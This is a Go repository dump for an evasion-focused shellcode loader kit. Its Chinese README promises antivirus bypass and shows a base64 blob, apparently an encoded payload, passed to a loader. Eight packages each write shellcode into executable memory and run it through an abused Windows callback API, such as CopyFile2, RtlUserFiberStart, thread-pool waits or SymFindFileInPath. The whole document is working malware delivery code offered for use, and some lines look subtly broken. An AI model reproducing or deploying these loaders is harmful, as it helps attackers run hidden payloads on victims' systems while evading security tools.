| -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Go-Packer-Loaders 2 | 帮你快速Go建你的免杀项目 3 | 4 | 5 | # Example 6 | ``` 7 | package main 8 | 9 | import ( 10 | "encoding/base64" 11 | "fmt" 12 | Loaders "github.com/ImCoriander/Go-Packer-Loaders/pkg/EnumPwrSchemes" 13 | 14 | ) 15 | 16 | // =================加密=============== 17 | var BaseStr = "6GoCAAACNNEI5LYdc4twYA7C9v//AEQwJA9EAiQP4vbFLfz+/oC/5+YRmZ2d6CKQq0vlQ2svr46+cnY3xeXv4ef1+//wBfK1ROTpvXXpIl+YpbgaXeVtbUFlDaO5+U3PIxW/aZ/ejAPUc8QOQmL4WXc0rC91VKA5E7cROUBYECaMGatieH2ZDbEFq0R0DyFnYvmABmL985mLabWLLr/ZV2exjXFdDTS6YDdwLLhAb8t38VyoHDa9E6xhY9/CFUlTgPlJNZTlwTTE8pVMrE79ZExKOaspmsYRb2quLhVobAWlXcqjZTN0HDn2gJ4zjIL31DO7H3L02elgqtHkTlOvs52r30oi+21wG7VVTV1H3Y1EHabrIntx1T+PLl1YRoMQeNdgoWOVlRGaeE6yHBpIGehbxwvQ9Fue7MDxzftc8nJY6WI6uTS+UJYoh4miqXjQU4DkyvDDhd+F5zYXsfhuhtrQu76Bn3bLS9uCLkI2/ycay67wDu6oLFptyl6hcNMDx4PDPSf8c1I4ylzgoJqDX9ocyuwvhY7niahMaEVRMpaq1OahYFZEeIPqgO96BNGGxcP3zTsXxPrfVSRJFbCeFL2lWP7xEItObT0DNGOFomMpEmm7bS1DZ5tSWdEUGmIb63A6NQZ0Ty9+PcHac/1YOuA2O8nAWqA5P6gl5PuYF2JoSOK7njjC3EMrTJKDqnF1yX0g5yFzXFVBs5tmYcdddmGOaFwBpAH2Rmo1j3Vet720w/0uNoIDSYYYzwOG8jVoTVuIBTMw9qiuV530F0pyWtMd6gtT7BuLyIm5MWckRSWp48eug8Chybnwvw9L9MtagQI/gFo/gXIEI3dScYFCCHWP5373Ugz/4g==" 18 | 19 | //=================加密=============== 20 | 21 | func main() { 22 | 23 | // 解码base64字符串 24 | data, err := base64.StdEncoding.DecodeString(BaseStr) 25 | if err != nil { 26 | fmt.Println("解码失败:", err) 27 | return 28 | } 29 | Loaders.Callback(data) 30 | 31 | } 32 | 33 | ``` 34 | 35 | 36 | # Help 37 | 38 | ## 一、初始化环境 39 | ``` 40 | go mod init main 41 | ``` 42 | ``` 43 | go mod tidy 44 | ``` 45 | 46 | ## 二、在项目中选择加载方式 47 | 例如上文提到:EnumPwrSchemes,如果需要用其他的加载方式,可直接更换名字!!! 48 | -------------------------------------------------------------------------------- /pkg/LdrpCallInitRoutine/LdrpCallInitRoutine.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | g_InitOnce [0]byte 10 | lpContext [0]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | NTDLL_LDRPCALLINITRT_OFFSET = 0x000199bc 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | GetModuleHandleW = kernel32.MustFindProc("GetModuleHandleW") 26 | GetProcAddress = kernel32.MustFindProc("GetProcAddress") 27 | GetModuleHandleA = kernel32.MustFindProc("GetModuleHandleA") 28 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 29 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 30 | ) 31 | 32 | type lpCallInitRoutine func(size_t uintptr, size_t1 uintptr, size_t2 uintptr) uintptr 33 | type pLdrpCallInitRoutine func(lpCallInitRoutine, size_t1, uint32, size_t uintptr) byte 34 | 35 | func Callback(shellcode []byte) { 36 | GetCurrentProcess.Call() 37 | 38 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 39 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 40 | 41 | hNtdll, _ := syscall.LoadLibrary("ntdll") 42 | LdrpCallInitRoutine := (*pLdrpCallInitRoutine)(unsafe.Pointer(uintptr(hNtdll) + NTDLL_LDRPCALLINITRT_OFFSET)) 43 | syscall.SyscallN(uintptr(unsafe.Pointer(LdrpCallInitRoutine)), 4, addr, 0, 0, 0) 44 | } 45 | -------------------------------------------------------------------------------- /pkg/ImageGetDigestStream/ImageGetDigestStream.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | dummy int 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO = 0x04 17 | GENERIC_READ = 0x80000000 18 | FILE_SHARE_READ = 0x00000001 19 | OPEN_EXISTING = 3 20 | FILE_ATTRIBUTE_NORMAL = 0x00000080 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 25 | ntdll = syscall.MustLoadDLL("ntdll.dll") 26 | Imagehlp = syscall.MustLoadDLL("Imagehlp.dll") 27 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 28 | CreateFileW = kernel32.MustFindProc("CreateFileW") 29 | CloseHandle = kernel32.MustFindProc("CloseHandle") 30 | ImageGetDigestStream = Imagehlp.MustFindProc("ImageGetDigestStream") 31 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 32 | ) 33 | 34 | func Callback(shellcode []byte) { 35 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | p1, _ := syscall.UTF16PtrFromString("C:\\Windows\\System32\\ntdll.dll") 38 | hImg, err1, err2 := CreateFileW.Call(uintptr(unsafe.Pointer(p1)), 39 | GENERIC_READ, FILE_SHARE_READ, 40 | 0, 41 | OPEN_EXISTING, 42 | FILE_ATTRIBUTE_NORMAL, 43 | 0) 44 | ImageGetDigestStream.Call(hImg, CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO, addr, (uintptr)(unsafe.Pointer(&dummy))) 45 | CloseHandle.Call((uintptr)(unsafe.Pointer(&dummy))) 46 | } 47 | -------------------------------------------------------------------------------- /pkg/CopyFile2/CopyFile2.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | type Copyfile2ExtendedParameters struct { 9 | dwSize *Copyfile2ExtendedParameters 10 | dwCopyFlags int 11 | pfCancel bool 12 | pProgressRoutine uintptr 13 | pvCallbackContext int 14 | } 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | COPY_FILE_FAIL_IF_EXISTS = 0x00000001 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 25 | ntdll = syscall.MustLoadDLL("ntdll.dll") 26 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 27 | DeleteFileW = kernel32.MustFindProc("DeleteFileW") 28 | CopyFile2 = kernel32.MustFindProc("CopyFile2") 29 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." { 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | 39 | params := &Copyfile2ExtendedParameters{} 40 | params.dwSize = params 41 | params.dwCopyFlags = COPY_FILE_FAIL_IF_EXISTS 42 | params.pfCancel = false 43 | params.pProgressRoutine = addr 44 | params.pvCallbackContext = 0 45 | 46 | p1, _ := syscall.UTF16PtrFromString("C:\\Windows\\Temp\\backup.log") 47 | p2, _ := syscall.UTF16PtrFromString("C:\\Windows\\DirectX.log") 48 | p3, _ := syscall.UTF16PtrFromString("C:\\Windows\\Temp\\backup.log") 49 | 50 | DeleteFileW.Call(uintptr(unsafe.Pointer(p1))) 51 | CopyFile2.Call(uintptr(unsafe.Pointer(p2)), uintptr(unsafe.Pointer(p3)), (uintptr)(unsafe.Pointer(¶ms))) 52 | } 53 | -------------------------------------------------------------------------------- /pkg/RtlUserFiberStart/RtlUserFiberStart.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "fmt" 5 | "golang.org/x/sys/windows" 6 | "log" 7 | "syscall" 8 | "unsafe" 9 | ) 10 | 11 | var ( 12 | g_InitOnce [0]byte 13 | lpContext [0]byte 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | TEB_FIBERDATA_PTR_OFFSET = 0x17ee 21 | HEAP_ZERO_MEMORY = 0x00000008 22 | ) 23 | 24 | var ( 25 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 26 | ntdll = syscall.MustLoadDLL("ntdll.dll") 27 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 28 | HeapAlloc = kernel32.MustFindProc("HeapAlloc") 29 | GetProcessHeap = kernel32.MustFindProc("GetProcessHeap") 30 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | hNtdll, err := windows.LoadLibrary("ntdll") 35 | if err != nil { 36 | log.Fatal(err) 37 | } 38 | RtlUserFiberStart, err1 := windows.GetProcAddress(hNtdll, "RtlUserFiberStart") 39 | if err1 != nil { 40 | log.Fatal(err1) 41 | } 42 | NtCurrentTeb, err2 := windows.GetProcAddress(hNtdll, "NtCurrentTeb") 43 | if err2 != nil { 44 | log.Fatal(err2) 45 | } 46 | teb, _, _ := syscall.SyscallN(NtCurrentTeb, 0) 47 | pTebFlags := teb + TEB_FIBERDATA_PTR_OFFSET 48 | pTebFlags1 := *(*int)(unsafe.Pointer(&pTebFlags)) | 0b100 49 | fmt.Println(pTebFlags1) 50 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE) 51 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 52 | p1, _, _ := GetProcessHeap.Call() 53 | lpDummyFiberData, _, _ := HeapAlloc.Call(p1, HEAP_ZERO_MEMORY, 0x100) 54 | p2 := (*uintptr)(unsafe.Pointer(lpDummyFiberData + 0x0a8)) 55 | *p2 = addr 56 | syscall.SyscallN(RtlUserFiberStart, 0) 57 | } 58 | -------------------------------------------------------------------------------- /pkg/CreateThreadPoolWait/CreateThreadPoolWait.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "time" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | old int 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | LEN = 277 18 | FALSE = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | CreateEventW = kernel32.MustFindProc("CreateEventW") 26 | VirtualProtect = kernel32.MustFindProc("VirtualProtect") 27 | SetThreadpoolWait = kernel32.MustFindProc("SetThreadpoolWait") 28 | CreateThreadpoolWait = kernel32.MustFindProc("CreateThreadpoolWait") 29 | SetEvent = kernel32.MustFindProc("SetEvent") 30 | WaitForThreadpoolWaitCallbacks = kernel32.MustFindProc("WaitForThreadpoolWaitCallbacks") 31 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 32 | ) 33 | 34 | func Callback(shellcode []byte) { 35 | hEvent, _, _ := CreateEventW.Call(0, 0, 0, 0) 36 | 37 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 38 | if err != nil && err.Error() != "The operation completed successfully." { 39 | syscall.Exit(0) 40 | } 41 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 42 | //VirtualProtect.Call(addr, LEN, windows.PAGE_EXECUTE_READ, (uintptr)(unsafe.Pointer(&old))) 43 | ptp_w, _, _ := CreateThreadpoolWait.Call(addr, 0, 0) 44 | SetThreadpoolWait.Call(ptp_w, hEvent, 0) 45 | SetEvent.Call(hEvent) 46 | WaitForThreadpoolWaitCallbacks.Call(ptp_w, FALSE) 47 | SetEvent.Call(hEvent) 48 | for { 49 | time.Sleep(9000) 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /pkg/SetupCommitFileQueueW/SetupCommitFileQueueW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | g_InitOnce [0]byte 10 | lpContext [0]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | SP_COPY_NOSKIP = 0x0000400 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | Setupapi = syscall.MustLoadDLL("Setupapi.dll") 25 | User32 = syscall.MustLoadDLL("User32.dll") 26 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 27 | SetupOpenFileQueue = Setupapi.MustFindProc("SetupOpenFileQueue") 28 | SetupQueueCopyW = Setupapi.MustFindProc("SetupQueueCopyW") 29 | SetupCommitFileQueueW = Setupapi.MustFindProc("SetupCommitFileQueueW") 30 | GetTopWindow = User32.MustFindProc("GetTopWindow") 31 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 32 | ) 33 | 34 | func Callback(shellcode []byte) { 35 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | hQueue, _, _ := SetupOpenFileQueue.Call() 38 | p1, _ := syscall.UTF16PtrFromString("c:\\") 39 | p2, _ := syscall.UTF16PtrFromString("\\windows\\sytem32\\") 40 | p3, _ := syscall.UTF16PtrFromString("kernel32.dll") 41 | p4, _ := syscall.UTF16PtrFromString("c:\\windows\\temp\\") 42 | SetupQueueCopyW.Call(hQueue, 43 | uintptr(unsafe.Pointer(p1)), 44 | uintptr(unsafe.Pointer(p2)), 45 | uintptr(unsafe.Pointer(p3)), 46 | NULL, 47 | NULL, 48 | uintptr(unsafe.Pointer(p4)), 49 | uintptr(unsafe.Pointer(p3)), 50 | SP_COPY_NOSKIP, 51 | ) 52 | Gtw, _, _ := GetTopWindow.Call() 53 | SetupCommitFileQueueW.Call(Gtw, hQueue, addr, NULL) 54 | } 55 | -------------------------------------------------------------------------------- /pkg/SymFindFileInPath/SymFindFileInPath.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "fmt" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | dummy [256]byte 11 | ) 12 | 13 | type Finfo struct { 14 | timestamp int 15 | size int 16 | } 17 | 18 | const ( 19 | MEM_COMMIT = 0x1000 20 | MEM_RESERVE = 0x2000 21 | PAGE_EXECUTE_READWRITE = 0x40 22 | NULL = 0 23 | TRUE = 1 24 | SSRVOPT_DWORDPTR = 0x00000004 25 | ) 26 | 27 | var ( 28 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 29 | ntdll = syscall.MustLoadDLL("ntdll.dll") 30 | Dbghelp = syscall.MustLoadDLL("Dbghelp.dll") 31 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 32 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 33 | SymInitialize = Dbghelp.MustFindProc("SymInitialize") 34 | SymSrvGetFileIndexInfo = Dbghelp.MustFindProc("SymSrvGetFileIndexInfo") 35 | SymFindFileInPath = Dbghelp.MustFindProc("SymFindFileInPath") 36 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 37 | ) 38 | 39 | func Callback(shellcode []byte) { 40 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 41 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 42 | hProcess, _, _ := GetCurrentProcess.Call() 43 | SymInitialize.Call(hProcess, NULL, TRUE) 44 | finfo := Finfo{} 45 | p1, _ := syscall.UTF16PtrFromString("c:\\windows\\system32\\kernel32.dll") 46 | _, err3, err4 := SymSrvGetFileIndexInfo.Call(uintptr(unsafe.Pointer(p1)), (uintptr)(unsafe.Pointer(&finfo)), NULL) 47 | p2, _ := syscall.UTF16PtrFromString("c:\\windows\\system32") 48 | p3, _ := syscall.UTF16PtrFromString("kernel32.dll") 49 | _, err1, err2 := SymFindFileInPath.Call( 50 | hProcess, 51 | uintptr(unsafe.Pointer(p2)), 52 | uintptr(unsafe.Pointer(p3)), 53 | (uintptr)(unsafe.Pointer(&finfo.timestamp)), 54 | (uintptr)(unsafe.Pointer(&finfo.size)), 55 | 0, 56 | SSRVOPT_DWORDPTR, 57 | (uintptr)(unsafe.Pointer(&dummy)), 58 | addr, 59 | NULL, 60 | ) 61 | fmt.Println(err1, err2) 62 | fmt.Println(err3, err4) 63 | } 64 | -------------------------------------------------------------------------------- /pkg/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | g_InitOnce [0]byte 10 | lpContext [0]byte 11 | hNtdll1 uintptr 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | NULL = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | GetModuleHandleW = kernel32.MustFindProc("GetModuleHandleW") 26 | GetProcAddress = kernel32.MustFindProc("GetProcAddress") 27 | LoadLibraryA = kernel32.MustFindProc("LoadLibraryA") 28 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 29 | ) 30 | 31 | type UNICODE_STRING struct { 32 | Length uint16 33 | MaximumLength uint16 34 | Buffer *uint16 35 | } 36 | 37 | type LDR_DATA_TABLE_ENTRY struct { 38 | InLoadOrderLinks LIST_ENTRY 39 | InMemoryOrderLinks LIST_ENTRY 40 | InInitializationOrderLinks LIST_ENTRY 41 | DllBase uintptr 42 | EntryPoint uintptr 43 | SizeOfImage uint32 44 | FullDllName UNICODE_STRING 45 | BaseDllName UNICODE_STRING 46 | Flags uint32 47 | LoadCount uint16 48 | TlsIndex uint16 49 | HashLinks LIST_ENTRY 50 | TimeDateStamp uint32 51 | } 52 | 53 | type LIST_ENTRY struct { 54 | Flink *LIST_ENTRY 55 | Blink *LIST_ENTRY 56 | } 57 | 58 | type LDR_ENUM_CALLBACK func(ModuleInformation *LDR_DATA_TABLE_ENTRY, Parameter int16, Stop int16) uintptr 59 | 60 | func Callback(shellcode []byte) { 61 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE) 62 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 63 | hNtdll, _ := syscall.LoadLibrary("ntdll") 64 | LdrEnumerateLoadedModules, _ := syscall.GetProcAddress(hNtdll, "LdrEnumerateLoadedModules") 65 | syscall.SyscallN(LdrEnumerateLoadedModules, NULL, addr, NULL) 66 | } 67 | --------------------------------------------------------------------------------